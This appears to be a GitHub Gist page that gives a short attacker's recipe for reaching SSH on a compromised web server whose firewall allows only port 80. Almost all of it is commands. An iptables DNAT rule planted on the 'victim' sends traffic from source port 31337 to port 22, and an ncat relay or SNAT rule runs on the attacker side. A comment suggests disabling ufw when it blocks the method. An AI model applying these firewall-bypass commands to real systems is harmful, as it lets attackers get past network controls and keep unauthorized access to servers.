Last active
August 29, 2015 14:27
-
-
Save tribela/63a9e6ad8c8d27546452 to your computer and use it in GitHub Desktop.
open ssh connection into server that protected by external firewall only 80 port is opened
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Victim is a web server that is protected by external firewall. 80 port is opened and 22 (ssh) port is filtered. | |
| # You cannot connect ssh into the server in this situation. But if you can run a single command (maybe web vulnerablity), | |
| # You can get into the server. | |
| victim $ iptables -t nat -A PREROUTING -p tcp --dport 80 --sport 31337 -j DNAT --to :22 | |
| attacker $ ncat -e "/bin/nc <victim> 80 -p 31337" -l 2222 | |
| attacker $ ssh -p 2222 localhost | |
| # Or use iptables | |
| attacker $ sudo iptables -t nat -A POSTROUTING -d <victim ip> -p tcp --dport 80 -j SNAT --to :31337 | |
| attacker $ ssh -p 80 <victim ip> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
It doesn't work if ufw is enabled.
(But you can disable ufw instead)